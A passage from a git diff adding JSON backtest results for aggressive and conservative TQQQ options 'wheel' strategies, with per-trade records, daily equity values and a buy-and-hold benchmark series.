0.9927918442803616, + "close_cost": 0.0, + "pnl": 93.29918442803616, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.2, + "spot": 31.23383331298828, + "premium": 1.1216158765653326, + "close_cost": 1.033833312988282, + "pnl": 5.788256357705061, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.36, + "spot": 32.73884201049805, + "premium": 0.7427742185642661, + "close_cost": 0.0, + "pnl": 68.2974218564266, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-31 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.77, + "spot": 28.451082229614258, + "premium": 0.8759655443304677, + "close_cost": 2.3189177703857418, + "pnl": -147.28522260552742, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 29.02, + "spot": 24.97538185119629, + "premium": 1.1985391574059925, + "close_cost": 0.12676682144129847, + "pnl": 101.1972335964694, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-04-04 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 25.47, + "spot": 20.402353286743164, + "premium": 1.2617950173549026, + "close_cost": 0.14710837543264432, + "pnl": 105.48866419222583, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 20.81, + "spot": 24.121355056762695, + "premium": 1.2512474271128369, + "close_cost": 3.3113550567626966, + "pnl": -209.000762964986, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.67, + "spot": 24.72215461730957, + "premium": 1.8845618356092615, + "close_cost": 0.8536548007825999, + "pnl": 97.11070348266615, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.54, + "spot": 23.858190536499023, + "premium": 1.656203135984132, + "close_cost": 0.5767811720737219, + "pnl": 101.962196391041, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-05-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.12, + "spot": 28.18792152404785, + "premium": 2.1781555533973744, + "close_cost": 1.056206295162876, + "pnl": 106.21492582344985, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.26, + "spot": 29.34979820251465, + "premium": 1.9102974940310684, + "close_cost": 0.4027426114272039, + "pnl": 144.77548826038645, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.71, + "spot": 35.223731994628906, + "premium": 0.47503503039711603, + "close_cost": 0.0005443672158748775, + "pnl": 41.46906631812412, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.69, + "spot": 35.55640411376953, + "premium": 0.4981695232149672, + "close_cost": 0.0313431195718612, + "pnl": 40.7026403643106, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.35, + "spot": 53.771759033203125, + "premium": 0.5454113173171304, + "close_cost": 0.007119044376069639, + "pnl": 47.849227294106086, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.0, + "spot": 53.437835693359375, + "premium": 0.5796126730757098, + "close_cost": 0.27775326332082884, + "pnl": 24.2059409754881, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.92, + "spot": 58.97001266479492, + "premium": 0.831086071889608, + "close_cost": 0.1181627822701854, + "pnl": 65.31232896194226, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.08, + "spot": 56.17401885986328, + "premium": 0.9419557282829452, + "close_cost": 0.023740456761812245, + "pnl": 85.84152715211329, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.03, + "spot": 49.864349365234375, + "premium": 0.7034804707833988, + "close_cost": 0.348952202481426, + "pnl": 29.47282683019728, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-11-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.52, + "spot": 50.91596221923828, + "premium": 0.7094039265346268, + "close_cost": 0.01077869047244212, + "pnl": 63.88252360621847, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.12240982055664, + "premium": 0.8885551408676484, + "close_cost": 0.22771827157727653, + "pnl": 60.10368692903718, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 55.83012771606445, + "premium": 0.701964653397182, + "close_cost": 0.19307191753726727, + "pnl": 44.90927358599147, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.29, + "spot": 51.34457778930664, + "premium": 0.534425402068404, + "close_cost": 0.18149583547824566, + "pnl": 29.312956659015843, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.654598236083984, + "premium": 0.5631882299256947, + "close_cost": 0.1361951854446426, + "pnl": 36.719304448105206, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 48.27019119262695, + "premium": 0.5999675089350074, + "close_cost": 0.2202825599062539, + "pnl": 31.98849490287535, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.72, + "spot": 51.78438186645508, + "premium": 0.5420435636602114, + "close_cost": 0.1837399581888901, + "pnl": 29.85036054713213, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.14, + "spot": 50.17703628540039, + "premium": 0.5493659811993652, + "close_cost": 0.16897163249998126, + "pnl": 32.059434869938386, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535077, + "close_cost": 0.07888536647136046, + "pnl": 31.848573628214726, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.48991036486796524, + "close_cost": 0.03275982095699792, + "pnl": 39.735054391096725, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.7825883684419921, + "close_cost": 0.1273844671440969, + "pnl": 59.540390129789515, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 53.40999984741211, + "premium": 1.0000270235383724, + "close_cost": 0.3787688574986454, + "pnl": 56.14581660397269, + "hold_days": 1, + "result": "Win" + } + ], + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "style": "aggressive" + }, + "start": "2021-04-24", + "end": "2026-04-24", + "_updated_at": "2026-04-24 18:51:36" +} \ No newline at end of file diff --git a/data/dashboard/wheel/tqqq_wheel_conservative_latest.json b/data/dashboard/wheel/tqqq_wheel_conservative_latest.json new file mode 100644 index 0000000..e9325c7 --- /dev/null +++ b/data/dashboard/wheel/tqqq_wheel_conservative_latest.json @@ -0,0 +1,6150 @@ +{ + "style": "conservative", + "result_payload": { + "equity": [ + [ + "2025-04-24", + 10001.173037138344 + ], + [ + "2025-04-25", + 10002.3462118783 + ], + [ + "2025-04-28", + 10003.519524236011 + ], + [ + "2025-04-29", + 10004.692974227619 + ], + [ + "2025-04-30", + 10005.866561869268 + ], + [ + "2025-05-01", + 10007.040287177108 + ], + [ + "2025-05-02", + 10008.214150167285 + ], + [ + "2025-05-05", + 10009.38815085595 + ], + [ + "2025-05-06", + 10010.562289259256 + ], + [ + "2025-05-07", + 10011.736565393358 + ], + [ + "2025-05-08", + 10012.910979274411 + ], + [ + "2025-05-09", + 10014.085530918574 + ], + [ + "2025-05-12", + 10015.260220342007 + ], + [ + "2025-05-13", + 10016.435047560872 + ], + [ + "2025-05-14", + 10017.610012591333 + ], + [ + "2025-05-15", + 10018.785115449555 + ], + [ + "2025-05-16", + 10019.960356151707 + ], + [ + "2025-05-19", + 10021.135734713958 + ], + [ + "2025-05-20", + 10022.31125115248 + ], + [ + "2025-05-21", + 10023.486905483445 + ], + [ + "2025-05-22", + 10024.66269772303 + ], + [ + "2025-05-23", + 10025.83862788741 + ], + [ + "2025-05-27", + 10027.014695992766 + ], + [ + "2025-05-28", + 10028.19090205528 + ], + [ + "2025-05-29", + 10029.367246091131 + ], + [ + "2025-05-30", + 10030.543728116507 + ], + [ + "2025-06-02", + 10031.720348147594 + ], + [ + "2025-06-03", + 10032.89710620058 + ], + [ + "2025-06-04", + 10034.074002291656 + ], + [ + "2025-06-05", + 10035.251036437016 + ], + [ + "2025-06-06", + 10036.428208652851 + ], + [ + "2025-06-09", + 10037.605518955359 + ], + [ + "2025-06-10", + 10038.782967360738 + ], + [ + "2025-06-11", + 10039.960553885187 + ], + [ + "2025-06-12", + 10041.138278544908 + ], + [ + "2025-06-13", + 10042.316141356107 + ], + [ + "2025-06-16", + 10043.494142334986 + ], + [ + "2025-06-17", + 10044.672281497757 + ], + [ + "2025-06-18", + 10045.850558860626 + ], + [ + "2025-06-20", + 10047.028974439807 + ], + [ + "2025-06-23", + 10048.20752825151 + ], + [ + "2025-06-24", + 10049.386220311953 + ], + [ + "2025-06-25", + 10050.565050637353 + ], + [ + "2025-06-26", + 10051.744019243928 + ], + [ + "2025-06-27", + 10052.923126147898 + ], + [ + "2025-06-30", + 10054.102371365487 + ], + [ + "2025-07-01", + 10055.28175491292 + ], + [ + "2025-07-02", + 10056.461276806422 + ], + [ + "2025-07-03", + 10057.640937062224 + ], + [ + "2025-07-07", + 10058.820735696554 + ], + [ + "2025-07-08", + 10060.000672725646 + ], + [ + "2025-07-09", + 10061.180748165734 + ], + [ + "2025-07-10", + 10062.360962033054 + ], + [ + "2025-07-11", + 10063.541314343844 + ], + [ + "2025-07-14", + 10064.721805114343 + ], + [ + "2025-07-15", + 10065.902434360793 + ], + [ + "2025-07-16", + 10067.083202099438 + ], + [ + "2025-07-17", + 10068.264108346526 + ], + [ + "2025-07-18", + 10069.4451531183 + ], + [ + "2025-07-21", + 10070.626336431013 + ], + [ + "2025-07-22", + 10071.807658300915 + ], + [ + "2025-07-23", + 10072.98911874426 + ], + [ + "2025-07-24", + 10074.170717777304 + ], + [ + "2025-07-25", + 10075.352455416301 + ], + [ + "2025-07-28", + 10076.534331677512 + ], + [ + "2025-07-29", + 10077.7163465772 + ], + [ + "2025-07-30", + 10078.898500131623 + ], + [ + "2025-07-31", + 10080.080792357048 + ], + [ + "2025-08-01", + 10081.263223269743 + ], + [ + "2025-08-04", + 10082.445792885976 + ], + [ + "2025-08-05", + 10083.628501222016 + ], + [ + "2025-08-06", + 10084.811348294137 + ], + [ + "2025-08-07", + 10085.994334118612 + ], + [ + "2025-08-08", + 10087.177458711718 + ], + [ + "2025-08-11", + 10088.360722089732 + ], + [ + "2025-08-12", + 10089.544124268934 + ], + [ + "2025-08-13", + 10090.727665265607 + ], + [ + "2025-08-14", + 10091.911345096036 + ], + [ + "2025-08-15", + 10093.095163776503 + ], + [ + "2025-08-18", + 10094.279121323298 + ], + [ + "2025-08-19", + 10095.463217752711 + ], + [ + "2025-08-20", + 10096.647453081032 + ], + [ + "2025-08-21", + 10097.831827324555 + ], + [ + "2025-08-22", + 10099.016340499576 + ], + [ + "2025-08-25", + 10100.200992622393 + ], + [ + "2025-08-26", + 10101.385783709302 + ], + [ + "2025-08-27", + 10102.570713776606 + ], + [ + "2025-08-28", + 10103.755782840606 + ], + [ + "2025-08-29", + 10104.94099091761 + ], + [ + "2025-09-02", + 10106.126338023923 + ], + [ + "2025-09-03", + 10107.311824175853 + ], + [ + "2025-09-04", + 10108.497449389712 + ], + [ + "2025-09-05", + 10109.68321368181 + ], + [ + "2025-09-08", + 10110.869117068465 + ], + [ + "2025-09-09", + 10112.05515956599 + ], + [ + "2025-09-10", + 10113.241341190707 + ], + [ + "2025-09-11", + 10114.427661958933 + ], + [ + "2025-09-12", + 10115.61412188699 + ], + [ + "2025-09-15", + 10116.800720991205 + ], + [ + "2025-09-16", + 10117.9874592879 + ], + [ + "2025-09-17", + 10119.174336793405 + ], + [ + "2025-09-18", + 10120.36135352405 + ], + [ + "2025-09-19", + 10121.548509496164 + ], + [ + "2025-09-22", + 10122.735804726084 + ], + [ + "2025-09-23", + 10123.923239230144 + ], + [ + "2025-09-24", + 10125.110813024681 + ], + [ + "2025-09-25", + 10126.298526126035 + ], + [ + "2025-09-26", + 10127.486378550546 + ], + [ + "2025-09-29", + 10128.674370314558 + ], + [ + "2025-09-30", + 10129.862501434416 + ], + [ + "2025-10-01", + 10131.050771926466 + ], + [ + "2025-10-02", + 10132.23918180706 + ], + [ + "2025-10-03", + 10133.427731092544 + ], + [ + "2025-10-06", + 10134.616419799275 + ], + [ + "2025-10-07", + 10135.805247943605 + ], + [ + "2025-10-08", + 10136.99421554189 + ], + [ + "2025-10-09", + 10138.183322610492 + ], + [ + "2025-10-10", + 10139.37256916577 + ], + [ + "2025-10-13", + 10140.561955224084 + ], + [ + "2025-10-14", + 10141.7514808018 + ], + [ + "2025-10-15", + 10142.941145915285 + ], + [ + "2025-10-16", + 10144.130950580906 + ], + [ + "2025-10-17", + 10145.320894815031 + ], + [ + "2025-10-20", + 10146.510978634036 + ], + [ + "2025-10-21", + 10147.701202054292 + ], + [ + "2025-10-22", + 10148.891565092175 + ], + [ + "2025-10-23", + 10150.082067764064 + ], + [ + "2025-10-24", + 10151.272710086338 + ], + [ + "2025-10-27", + 10152.463492075378 + ], + [ + "2025-10-28", + 10153.654413747567 + ], + [ + "2025-10-29", + 10154.845475119291 + ], + [ + "2025-10-30", + 10156.036676206937 + ], + [ + "2025-10-31", + 10157.228017026895 + ], + [ + "2025-11-03", + 10158.419497595556 + ], + [ + "2025-11-04", + 10159.611117929313 + ], + [ + "2025-11-05", + 10160.80287804456 + ], + [ + "2025-11-06", + 10161.994777957694 + ], + [ + "2025-11-07", + 10163.186817685115 + ], + [ + "2025-11-10", + 10164.378997243222 + ], + [ + "2025-11-11", + 10165.57131664842 + ], + [ + "2025-11-12", + 10166.763775917112 + ], + [ + "2025-11-13", + 10167.956375065705 + ], + [ + "2025-11-14", + 10169.149114110607 + ], + [ + "2025-11-17", + 10170.341993068228 + ], + [ + "2025-11-18", + 10171.535011954982 + ], + [ + "2025-11-19", + 10172.72817078728 + ], + [ + "2025-11-20", + 10173.921469581543 + ], + [ + "2025-11-21", + 10172.124908354184 + ], + [ + "2025-11-24", + 10242.875502053761 + ], + [ + "2025-11-25", + 10264.35836972952 + ], + [ + "2025-11-26", + 10282.336768370122 + ], + [ + "2025-11-28", + 10283.542924659949 + ], + [ + "2025-12-01", + 10284.749222436387 + ], + [ + "2025-12-02", + 10285.955661716034 + ], + [ + "2025-12-03", + 10287.16224251549 + ], + [ + "2025-12-04", + 10288.368964851354 + ], + [ + "2025-12-05", + 10289.57582874023 + ], + [ + "2025-12-08", + 10290.782834198722 + ], + [ + "2025-12-09", + 10291.989981243438 + ], + [ + "2025-12-10", + 10293.197269890985 + ], + [ + "2025-12-11", + 10294.404700157973 + ], + [ + "2025-12-12", + 10295.612272061016 + ], + [ + "2025-12-15", + 10296.819985616728 + ], + [ + "2025-12-16", + 10298.027840841725 + ], + [ + "2025-12-17", + 10299.235837752627 + ], + [ + "2025-12-18", + 10300.443976366052 + ], + [ + "2025-12-19", + 10301.652256698624 + ], + [ + "2025-12-22", + 10302.860678766965 + ], + [ + "2025-12-23", + 10304.069242587704 + ], + [ + "2025-12-24", + 10305.277948177467 + ], + [ + "2025-12-26", + 10306.486795552884 + ], + [ + "2025-12-29", + 10307.695784730588 + ], + [ + "2025-12-30", + 10308.904915727213 + ], + [ + "2025-12-31", + 10310.114188559393 + ], + [ + "2026-01-02", + 10311.323603243769 + ], + [ + "2026-01-05", + 10312.533159796978 + ], + [ + "2026-01-06", + 10313.742858235662 + ], + [ + "2026-01-07", + 10314.952698576468 + ], + [ + "2026-01-08", + 10316.162680836038 + ], + [ + "2026-01-09", + 10317.37280503102 + ], + [ + "2026-01-12", + 10318.583071178065 + ], + [ + "2026-01-13", + 10319.793479293823 + ], + [ + "2026-01-14", + 10321.00402939495 + ], + [ + "2026-01-15", + 10322.214721498098 + ], + [ + "2026-01-16", + 10323.425555619926 + ], + [ + "2026-01-20", + 10324.636531777094 + ], + [ + "2026-01-21", + 10325.847649986263 + ], + [ + "2026-01-22", + 10327.058910264095 + ], + [ + "2026-01-23", + 10328.270312627255 + ], + [ + "2026-01-26", + 10329.481857092413 + ], + [ + "2026-01-27", + 10330.693543676236 + ], + [ + "2026-01-28", + 10331.905372395395 + ], + [ + "2026-01-29", + 10333.117343266564 + ], + [ + "2026-01-30", + 10334.329456306416 + ], + [ + "2026-02-02", + 10335.541711531629 + ], + [ + "2026-02-03", + 10336.754108958881 + ], + [ + "2026-02-04", + 10337.966648604855 + ], + [ + "2026-02-05", + 10336.189330486233 + ], + [ + "2026-02-06", + 10365.442052060358 + ], + [ + "2026-02-09", + 10393.125118991906 + ], + [ + "2026-02-10", + 10387.206759066115 + ], + [ + "2026-02-11", + 10395.58962891959 + ], + [ + "2026-02-12", + 10333.17951032718 + ], + [ + "2026-02-13", + 10343.402612768348 + ], + [ + "2026-02-17", + 10357.34795019732 + ], + [ + "2026-02-18", + 10396.264536658502 + ], + [ + "2026-02-19", + 10400.318348409004 + ], + [ + "2026-02-20", + 10417.844160971756 + ], + [ + "2026-02-23", + 10419.066212781987 + ], + [ + "2026-02-24", + 10420.288407943433 + ], + [ + "2026-02-25", + 10421.510746472912 + ], + [ + "2026-02-26", + 10422.733228387238 + ], + [ + "2026-02-27", + 10423.955853703234 + ], + [ + "2026-03-02", + 10425.17862243772 + ], + [ + "2026-03-03", + 10426.40153460752 + ], + [ + "2026-03-04", + 10427.624590229458 + ], + [ + "2026-03-05", + 10428.847789320364 + ], + [ + "2026-03-06", + 10430.071131897064 + ], + [ + "2026-03-09", + 10431.294617976393 + ], + [ + "2026-03-10", + 10432.518247575183 + ], + [ + "2026-03-11", + 10433.74202071027 + ], + [ + "2026-03-12", + 10434.965937398489 + ], + [ + "2026-03-13", + 10436.189997656682 + ], + [ + "2026-03-16", + 10437.41420150169 + ], + [ + "2026-03-17", + 10438.638548950354 + ], + [ + "2026-03-18", + 10439.863040019522 + ], + [ + "2026-03-19", + 10441.087674726039 + ], + [ + "2026-03-20", + 10442.312453086755 + ], + [ + "2026-03-23", + 10443.537375118522 + ], + [ + "2026-03-24", + 10444.762440838193 + ], + [ + "2026-03-25", + 10445.987650262621 + ], + [ + "2026-03-26", + 10447.213003408666 + ], + [ + "2026-03-27", + 10445.448500293185 + ], + [ + "2026-03-30", + 10433.689472932487 + ], + [ + "2026-03-31", + 10467.382284274632 + ], + [ + "2026-04-01", + 10500.276992915504 + ], + [ + "2026-04-02", + 10505.848498184801 + ], + [ + "2026-04-06", + 10529.772190631718 + ], + [ + "2026-04-07", + 10531.00737201551 + ], + [ + "2026-04-08", + 10532.242698290665 + ], + [ + "2026-04-09", + 10533.478169474181 + ], + [ + "2026-04-10", + 10534.713785583055 + ], + [ + "2026-04-13", + 10535.949546634287 + ], + [ + "2026-04-14", + 10537.185452644879 + ], + [ + "2026-04-15", + 10538.421503631836 + ], + [ + "2026-04-16", + 10539.657699612166 + ], + [ + "2026-04-17", + 10540.894040602874 + ], + [ + "2026-04-20", + 10542.130526620973 + ], + [ + "2026-04-21", + 10543.367157683473 + ], + [ + "2026-04-22", + 10544.60393380739 + ], + [ + "2026-04-23", + 10545.84085500974 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479693975612 + ], + [ + "2025-04-28", + 10108.271107088458 + ], + [ + "2025-04-29", + 10175.030711228887 + ], + [ + "2025-04-30", + 10173.74596416855 + ], + [ + "2025-05-01", + 10306.622798919238 + ], + [ + "2025-05-02", + 10459.61333969014 + ], + [ + "2025-05-05", + 10397.560975289682 + ], + [ + "2025-05-06", + 10300.846030216884 + ], + [ + "2025-05-07", + 10341.286691897052 + ], + [ + "2025-05-08", + 10448.059146132695 + ], + [ + "2025-05-09", + 10441.21153616248 + ], + [ + "2025-05-12", + 10866.589450612499 + ], + [ + "2025-05-13", + 11032.205682361446 + ], + [ + "2025-05-14", + 11098.320944513494 + ], + [ + "2025-05-15", + 11110.516199295633 + ], + [ + "2025-05-16", + 11158.875968366614 + ], + [ + "2025-05-19", + 11169.57519490689 + ], + [ + "2025-05-20", + 11132.341151655664 + ], + [ + "2025-05-21", + 10977.640020697681 + ], + [ + "2025-05-22", + 10998.182850608326 + ], + [ + "2025-05-23", + 10896.330229599655 + ], + [ + "2025-05-27", + 11152.668763468355 + ], + [ + "2025-05-28", + 11103.240777740464 + ], + [ + "2025-05-29", + 11125.068354711446 + ], + [ + "2025-05-30", + 11107.521518200956 + ], + [ + "2025-06-02", + 11195.250451531507 + ], + [ + "2025-06-03", + 11282.765479069581 + ], + [ + "2025-06-04", + 11314.218816702027 + ], + [ + "2025-06-05", + 11229.056752881199 + ], + [ + "2025-06-06", + 11338.825856669733 + ], + [ + "2025-06-09", + 11355.515757704841 + ], + [ + "2025-06-10", + 11430.620312362824 + ], + [ + "2025-06-11", + 11392.102834356734 + ], + [ + "2025-06-12", + 11418.850244554687 + ], + [ + "2025-06-13", + 11275.491369819887 + ], + [ + "2025-06-16", + 11432.331558702639 + ], + [ + "2025-06-17", + 11320.852520879764 + ], + [ + "2025-06-18", + 11318.926056441996 + ], + [ + "2025-06-20", + 11272.70928221221 + ], + [ + "2025-06-23", + 11388.619975625237 + ], + [ + "2025-06-24", + 11562.774722949349 + ], + [ + "2025-06-25", + 11592.33440378091 + ], + [ + "2025-06-26", + 11700.72558682036 + ], + [ + "2025-06-27", + 11740.785023759947 + ], + [ + "2025-06-30", + 11816.830501443734 + ], + [ + "2025-07-01", + 11717.221266645118 + ], + [ + "2025-07-02", + 11798.836168766158 + ], + [ + "2025-07-03", + 11914.939771084057 + ], + [ + "2025-07-07", + 11825.184638099614 + ], + [ + "2025-07-08", + 11831.826216110203 + ], + [ + "2025-07-09", + 11915.581488461488 + ], + [ + "2025-07-10", + 11898.445403564772 + ], + [ + "2025-07-11", + 11871.669122646364 + ], + [ + "2025-07-14", + 11914.72586529158 + ], + [ + "2025-07-15", + 11925.649496068136 + ], + [ + "2025-07-16", + 11937.861810821454 + ], + [ + "2025-07-17", + 12034.469802998014 + ], + [ + "2025-07-18", + 12022.903142538553 + ], + [ + "2025-07-21", + 12085.23896492168 + ], + [ + "2025-07-22", + 12022.689236746075 + ], + [ + "2025-07-23", + 12077.526545643232 + ], + [ + "2025-07-24", + 12103.23198529378 + ], + [ + "2025-07-25", + 12132.366479151337 + ], + [ + "2025-07-28", + 12170.281608944255 + ], + [ + "2025-07-29", + 12151.431653096772 + ], + [ + "2025-07-30", + 12167.710802518104 + ], + [ + "2025-07-31", + 12103.23198529378 + ], + [ + "2025-08-01", + 11864.813638843298 + ], + [ + "2025-08-04", + 12083.73899976339 + ], + [ + "2025-08-05", + 12001.696286057397 + ], + [ + "2025-08-06", + 12152.717712462585 + ], + [ + "2025-08-07", + 12193.844053753606 + ], + [ + "2025-08-08", + 12307.592067743308 + ], + [ + "2025-08-11", + 12271.17427849773 + ], + [ + "2025-08-12", + 12425.4082287065 + ], + [ + "2025-08-13", + 12431.621995132135 + ], + [ + "2025-08-14", + 12421.980486804965 + ], + [ + "2025-08-15", + 12367.358396005762 + ], + [ + "2025-08-18", + 12362.430688945939 + ], + [ + "2025-08-19", + 12194.70098922899 + ], + [ + "2025-08-20", + 12122.297159239215 + ], + [ + "2025-08-21", + 12066.175103281721 + ], + [ + "2025-08-22", + 12252.324322650247 + ], + [ + "2025-08-25", + 12216.981311588957 + ], + [ + "2025-08-26", + 12266.03266564543 + ], + [ + "2025-08-27", + 12284.885246103864 + ], + [ + "2025-08-28", + 12361.787659263033 + ], + [ + "2025-08-29", + 12218.693870234249 + ], + [ + "2025-09-02", + 12116.299923217006 + ], + [ + "2025-09-03", + 12211.624480638704 + ], + [ + "2025-09-04", + 12322.157346213875 + ], + [ + "2025-09-05", + 12339.93777309897 + ], + [ + "2025-09-08", + 12400.131912946379 + ], + [ + "2025-09-09", + 12435.262330520669 + ], + [ + "2025-09-10", + 12439.333102105109 + ], + [ + "2025-09-11", + 12511.736932094884 + ], + [ + "2025-09-12", + 12567.00336488247 + ], + [ + "2025-09-15", + 12674.537612446535 + ], + [ + "2025-09-16", + 12663.826575156982 + ], + [ + "2025-09-17", + 12638.551571702337 + ], + [ + "2025-09-18", + 12752.51217917904 + ], + [ + "2025-09-19", + 12838.839570261951 + ], + [ + "2025-09-22", + 12914.844366476002 + ], + [ + "2025-09-23", + 12829.060269859874 + ], + [ + "2025-09-24", + 12784.0232582524 + ], + [ + "2025-09-25", + 12728.907740594477 + ], + [ + "2025-09-26", + 12781.234609117348 + ], + [ + "2025-09-29", + 12840.426147581611 + ], + [ + "2025-09-30", + 12875.598558931111 + ], + [ + "2025-10-01", + 12937.362216127001 + ], + [ + "2025-10-02", + 12990.548644736205 + ], + [ + "2025-10-03", + 12935.86225096871 + ], + [ + "2025-10-06", + 13033.012225306578 + ], + [ + "2025-10-07", + 12964.38521047477 + ], + [ + "2025-10-08", + 13113.006430165598 + ], + [ + "2025-10-09", + 13097.136720052566 + ], + [ + "2025-10-10", + 12642.479301989966 + ], + [ + "2025-10-13", + 12910.769657975135 + ], + [ + "2025-10-14", + 12824.77165556653 + ], + [ + "2025-10-15", + 12915.273490366431 + ], + [ + "2025-10-16", + 12867.44914192938 + ], + [ + "2025-10-17", + 12951.94586687422 + ], + [ + "2025-10-20", + 13115.15073731227 + ], + [ + "2025-10-21", + 13111.720370799785 + ], + [ + "2025-10-22", + 12985.401782662004 + ], + [ + "2025-10-23", + 13094.563289015465 + ], + [ + "2025-10-24", + 13234.390749716182 + ], + [ + "2025-10-27", + 13470.084749999902 + ], + [ + "2025-10-28", + 13573.668958083257 + ], + [ + "2025-10-29", + 13634.790897901716 + ], + [ + "2025-10-30", + 13426.333797758241 + ], + [ + "2025-10-31", + 13491.10263449261 + ], + [ + "2025-11-03", + 13555.653628518077 + ], + [ + "2025-11-04", + 13280.49991489699 + ], + [ + "2025-11-05", + 13366.929665806976 + ], + [ + "2025-11-06", + 13117.939386447322 + ], + [ + "2025-11-07", + 13076.547959450285 + ], + [ + "2025-11-10", + 13365.856199928165 + ], + [ + "2025-11-11", + 13330.25597699371 + ], + [ + "2025-11-12", + 13319.747034747355 + ], + [ + "2025-11-13", + 13047.81109415175 + ], + [ + "2025-11-14", + 13057.675694409723 + ], + [ + "2025-11-17", + 12946.155975117113 + ], + [ + "2025-11-18", + 12788.52577833822 + ], + [ + "2025-11-19", + 12864.874398586804 + ], + [ + "2025-11-20", + 12560.339477678799 + ], + [ + "2025-11-21", + 12654.703427492563 + ], + [ + "2025-11-24", + 12978.324519233609 + ], + [ + "2025-11-25", + 13058.320036398105 + ], + [ + "2025-11-26", + 13173.699246093627 + ], + [ + "2025-11-28", + 13280.49991489699 + ], + [ + "2025-12-01", + 13235.892027179945 + ], + [ + "2025-12-02", + 13339.476235263302 + ], + [ + "2025-12-03", + 13372.075215575702 + ], + [ + "2025-12-04", + 13359.637184280627 + ], + [ + "2025-12-05", + 13414.109672255645 + ], + [ + "2025-12-08", + 13388.374049579163 + ], + [ + "2025-12-09", + 13404.886789375103 + ], + [ + "2025-12-10", + 13459.789713546024 + ], + [ + "2025-12-11", + 13416.255291707792 + ], + [ + "2025-12-12", + 13159.758625029313 + ], + [ + "2025-12-15", + 13093.705041234607 + ], + [ + "2025-12-16", + 13119.654569703565 + ], + [ + "2025-12-17", + 12876.455494406495 + ], + [ + "2025-12-18", + 13063.036462276401 + ], + [ + "2025-12-19", + 13233.31990844832 + ], + [ + "2025-12-22", + 13296.752818208815 + ], + [ + "2025-12-23", + 13359.025649929128 + ], + [ + "2025-12-24", + 13398.108731595079 + ], + [ + "2025-12-26", + 13397.249171508745 + ], + [ + "2025-12-29", + 13332.398971834906 + ], + [ + "2025-12-30", + 13301.47580561449 + ], + [ + "2025-12-31", + 13191.530852892261 + ], + [ + "2026-01-02", + 13165.97764067685 + ], + [ + "2026-01-05", + 13270.553951699547 + ], + [ + "2026-01-06", + 13387.156230098068 + ], + [ + "2026-01-07", + 13400.041757560224 + ], + [ + "2026-01-08", + 13323.808620193468 + ], + [ + "2026-01-09", + 13456.516823690577 + ], + [ + "2026-01-12", + 13467.683230980068 + ], + [ + "2026-01-13", + 13447.712566256663 + ], + [ + "2026-01-14", + 13304.053173568016 